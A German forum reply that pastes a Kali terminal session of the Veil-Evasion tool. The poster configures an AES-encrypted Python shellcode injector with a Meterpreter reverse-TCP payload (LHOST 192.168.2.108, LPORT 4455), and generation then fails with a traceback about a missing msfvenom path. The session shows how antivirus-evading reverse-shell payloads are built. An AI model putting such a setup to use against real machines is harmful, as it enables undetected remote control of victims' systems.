Zitat Zitat von Braz Beitrag anzeigen
Wieso nicht, gibts einen Errorlog?

VG,
Braz
Payload: python/shellcode_inject/aes_encrypt loaded


Required Options:

Name Current Value Description
---- ------------- -----------
COMPILE_TO_EXE Y Compile to an executable
EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days ("X" disables feature)
INJECT_METHOD Virtual Virtual, Void, Heap
USE_PYHERION N Use the pyherion encrypter

Available Commands:

set Set a specific option value
info Show information about the payload
options Show payload's options
generate Generate payload
back Go to the main menu
exit exit Veil-Evasion

[python/shellcode_inject/aes_encrypt>>]: generate

================================================== =======================
Veil-Evasion | [Version]: 2.28.2
================================================== =======================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
================================================== =======================

[?] Use msfvenom or supply custom shellcode?

1 - msfvenom (default)
2 - custom shellcode string
3 - file with shellcode (raw)

[>] Please enter the number of your choice:

[*] Press [enter] for windows/meterpreter/reverse_tcp
[*] Press [tab] to list available payloads
[>] Please enter metasploit payload:
[>] Enter value for 'LHOST', [tab] for local IP: 192.168.2.108
[>] Enter value for 'LPORT': 4455
[>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2):

[*] Generating shellcode...
Traceback (most recent call last):
File "./Veil-Evasion.py", line 339, in <module>
controller.MainMenu(args=args)
File "/root/Veil/Veil-Evasion/modules/common/controller.py", line 875, in MainMenu
self.outputFileName = self.PayloadMenu(self.payload, args=args)
File "/root/Veil/Veil-Evasion/modules/common/controller.py", line 801, in PayloadMenu
payloadCode = payload.generate()
File "/root/Veil/Veil-Evasion//modules/payloads/python/shellcode_inject/aes_encrypt.py", line 51, in generate
Shellcode = self.shellcode.generate(self.required_options)
File "/root/Veil/Veil-Evasion/modules/common/shellcode.py", line 501, in generate
FuncShellcode = subprocess.check_output(settings.MSFVENOM_PATH + self.msfvenomCommand, shell=True)
AttributeError: 'module' object has no attribute 'MSFVENOM_PATH'
root@kali:~/Veil/Veil-Evasion#